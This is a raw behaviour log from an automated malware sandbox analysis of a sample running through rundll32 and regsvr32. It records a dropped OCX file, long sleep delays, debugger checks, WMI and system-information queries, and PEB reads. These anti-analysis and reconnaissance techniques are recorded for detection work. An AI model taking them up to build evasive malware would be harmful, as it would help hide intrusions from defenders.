                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,18_2_7EDBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetAdaptersInfo,34_2_7EEBB430
                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocxJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160Thread sleep time: -130000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160Thread sleep time: -130000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164Thread sleep time: -130000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164Thread sleep time: -130000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172Thread sleep time: -130000s >= -30000s
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172Thread sleep time: -130000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AAF80 GetSystemInfo,14_2_7F3AAF80
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 130000
                Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 130000
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW,14_2_7F3E6967
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AAF80 mov edx, dword ptr fs:[00000030h]14_2_7F3AAF80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B0DD0 mov ecx, dword ptr fs:[00000030h]14_2_7F3B0DD0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AE860 mov ecx, dword ptr fs:[00000030h]14_2_7F3AE860
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3728BF mov edx, dword ptr fs:[00000030h]14_2_7F3728BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]14_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB430 mov edx, dword ptr fs:[00000030h]14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F396330 mov ecx, dword ptr fs:[00000030h]14_2_7F396330
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AE390 mov edx, dword ptr fs:[00000030h]14_2_7F3AE390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E7E46 mov eax, dword ptr fs:[00000030h]14_2_7F3E7E46
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E7EBB mov eax, dword ptr fs:[00000030h]14_2_7F3E7EBB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F356D10 mov eax, dword ptr fs:[00000030h]14_2_7F356D10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F377DB0 mov eax, dword ptr fs:[00000030h]14_2_7F377DB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F356DAA mov eax, dword ptr fs:[00000030h]14_2_7F356DAA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F37BC30 mov edx, dword ptr fs:[00000030h]14_2_7F37BC30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F37BC30 mov eax, dword ptr fs:[00000030h]14_2_7F37BC30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3A9C60 mov eax, dword ptr fs:[00000030h]14_2_7F3A9C60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F356B00 mov edx, dword ptr fs:[00000030h]14_2_7F356B00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F394B90 mov ecx, dword ptr fs:[00000030h]14_2_7F394B90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F376B80 mov edx, dword ptr fs:[00000030h]14_2_7F376B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F377A60 mov edx, dword ptr fs:[00000030h]14_2_7F377A60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3CFA90 mov eax, dword ptr fs:[00000030h]14_2_7F3CFA90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F373992 mov edx, dword ptr fs:[00000030h]14_2_7F373992
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3848E0 mov ecx, dword ptr fs:[00000030h]14_2_7F3848E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]14_2_7F3AA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AA730 mov eax, dword ptr fs:[00000030h]14_2_7F3AA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]14_2_7F3AA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F369790 mov edx, dword ptr fs:[00000030h]14_2_7F369790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]14_2_7F369790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]14_2_7F369790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]14_2_7F354664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]14_2_7F354664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354664 mov edx, dword ptr fs:[00000030h]14_2_7F354664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AE570 mov eax, dword ptr fs:[00000030h]14_2_7F3AE570
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F37757D mov eax, dword ptr fs:[00000030h]14_2_7F37757D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]14_2_7F3AD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]14_2_7F3AD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]14_2_7F3AD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AD5B0 mov edx, dword ptr fs:[00000030h]14_2_7F3AD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]14_2_7F3AD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AC340 mov eax, dword ptr fs:[00000030h]14_2_7F3AC340
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AE380 mov eax, dword ptr fs:[00000030h]14_2_7F3AE380
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F37C230 mov eax, dword ptr fs:[00000030h]14_2_7F37C230
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AB130 mov eax, dword ptr fs:[00000030h]14_2_7F3AB130
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]14_2_7F354110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354174 mov edx, dword ptr fs:[00000030h]14_2_7F354174
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F354174 mov ecx, dword ptr fs:[00000030h]14_2_7F354174
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F357160 mov edx, dword ptr fs:[00000030h]14_2_7F357160
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov ecx, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov eax, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]14_2_7F3551EF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBAF80 mov edx, dword ptr fs:[00000030h]18_2_7EDBAF80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBE860 mov ecx, dword ptr fs:[00000030h]18_2_7EDBE860
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED83972 mov edx, dword ptr fs:[00000030h]18_2_7ED83972
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]18_2_7EDBB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]18_2_7EDBB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB430 mov edx, dword ptr fs:[00000030h]18_2_7EDBB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]18_2_7EDBB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]18_2_7EDBB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]18_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBE390 mov edx, dword ptr fs:[00000030h]18_2_7EDBE390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA6330 mov ecx, dword ptr fs:[00000030h]18_2_7EDA6330
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED86ED0 mov edx, dword ptr fs:[00000030h]18_2_7ED86ED0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF7E8A mov eax, dword ptr fs:[00000030h]18_2_7EDF7E8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF7EBB mov eax, dword ptr fs:[00000030h]18_2_7EDF7EBB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF7E46 mov eax, dword ptr fs:[00000030h]18_2_7EDF7E46
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov ecx, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]18_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]18_2_7EDC7F60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC7F60 mov edx, dword ptr fs:[00000030h]18_2_7EDC7F60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC7F60 mov eax, dword ptr fs:[00000030h]18_2_7EDC7F60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]18_2_7EDC7F60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF0C78 mov ecx, dword ptr fs:[00000030h]18_2_7EDF0C78
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB9C60 mov eax, dword ptr fs:[00000030h]18_2_7EDB9C60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8BC30 mov edx, dword ptr fs:[00000030h]18_2_7ED8BC30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8BC30 mov eax, dword ptr fs:[00000030h]18_2_7ED8BC30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED87DB0 mov eax, dword ptr fs:[00000030h]18_2_7ED87DB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED66DAA mov eax, dword ptr fs:[00000030h]18_2_7ED66DAA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED66D10 mov eax, dword ptr fs:[00000030h]18_2_7ED66D10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov eax, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]18_2_7ED97AE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDDFA90 mov eax, dword ptr fs:[00000030h]18_2_7EDDFA90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]18_2_7EDC8A40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC8A40 mov edx, dword ptr fs:[00000030h]18_2_7EDC8A40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC8A40 mov eax, dword ptr fs:[00000030h]18_2_7EDC8A40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]18_2_7EDC8A40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED87A60 mov edx, dword ptr fs:[00000030h]18_2_7ED87A60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov edx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]18_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA4B90 mov ecx, dword ptr fs:[00000030h]18_2_7EDA4B90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED86B80 mov edx, dword ptr fs:[00000030h]18_2_7ED86B80
